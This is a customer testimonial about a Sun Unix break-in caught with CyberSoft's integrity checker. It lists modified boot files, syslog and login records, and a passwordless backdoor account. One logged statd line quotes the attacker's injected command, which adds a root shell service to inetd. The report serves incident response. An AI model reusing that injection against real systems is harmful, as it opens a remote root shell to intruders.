This report was written by the customer who is using the product. CyberSoft's only edits to the document were to remove the organization name (at their request) and improve formatting for ease of reading.

As an Internet Administrator whose main servers are Sun Unix systems, I always seem to be fighting that never ending battle of keeping crackers off my computers. Even with the security patches, router access control and just simply phoning providers after finding someone suspiciously banging on our door, one of those perps got lucky.

One morning I tried to log into our main Sun after a long weekend and found that my terminal was booby trapped. No matter what key I hit garbage came whizzing by on the monitor. Hopefully, being a little smarter than those other joes I did not do a "stop a". Instead I did a Telnet into the server from another computer and looked around. If it wasn't for your Cybersoft Cryptographic Integrity Tool, I would never have known that my /etc/rc* boot files were modified. If I did the reboot like that slug wanted me to, all the boot files that replaced mine would have taken effect. Instead I noted all the modified files in the CIT output listing, loaded a backup tape and put every thing back like it should have been. I must say that the CIT has really made my life administering my system easier. Besides saving my preverbal skin that day and using it other times to check for suspicious changes, I look at that output everyday to give me an indication of what is going on on the whole system. Great Tool.

I would say it took about 1 hour to fix and 10 minutes to figure out where tunaman (the cracker) came from. There were more files than in the /etc/rc* directories added or modified - see CIT output below.

The CIT output (abbreviated). All the changes I found :

New files:
/etc/shells
/usr/bin/xstat
/var/spool/calendar/callog.root.BRG
/var/spool/calendar/callog.root.LNA
/var/spool/calendar/callog.root.SPN

Modified files:
/etc/init.d/nfs.client
/etc/init.d/rpc
/etc/oshadow
/etc/rc0.d/K75nfs.client
/etc/rc0.d/K85rpc
/etc/rc1.d/K67rpc
/etc/rc1.d/K80nfs.client
/etc/rc2.d/S71rpc
/etc/rc2.d/S73nfs.client
/usr/bin/login
/usr/sbin/inetd

Errors in the messages file showing the "calendar" exploit used

Aug 29 09:35:12 mciunix inetd[121]: accept: Protocol error
Aug 29 17:03:25 mciunix statd[124]: attempt to create "/var/statmon/sm/; echo "pcserver
stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &"
Aug 29 17:07:37 mciunix inetd[121]: /usr/openwin/bin/rpc.cmsd: Child Status Changed
Aug 29 17:08:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:08:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:18:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:28:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:38:07 mciunix inetd[9825]: ingreslock/tcp: bind: Address already in use
Aug 29 17:46:55 mciunix inetd[10414]: rusersd/rpc/datagram_v,circuit_v: tli_socket: No such
file or directory
Aug 29 18:09:44 mciunix inetd[10639]: rusersd/rpc/datagram_v,circuit_v: tli_socket: No such
file or directory
Aug 29 18:32:44 mciunix inetd[10639]: accept: Protocol error
Aug 29 18:32:44 mciunix inetd[10639]: accept: Protocol error
Aug 29 18:32:45 mciunix inetd[10639]: accept: Protocol error

Output from "last"

lastout:tunaman ftp ppp-206-170-224- Sun Aug 29 17:45 - 17:46 (00:00)
lastout:tunaman ftp ppp-206-170-224- Sun Aug 29 17:44 - 17:45 (00:01)
lastout:tunaman pts/1 ppp-206-170-224- Sun Aug 29 17:43 - 17:43 (00:00)

from who -a /var/adm/wtmp | grep tunaman

tunaman ppp-206-170-224-218.nhwd02.pacbell.net
tunaman ppp-206-170-224-218.nhwd02.pacbell.net

shadow file

shadow:tunaman::10832:0:0::::

/var/spool/calendar directory contents

callog.root callog.root.BRG callog.root.LNA callog.root.SPN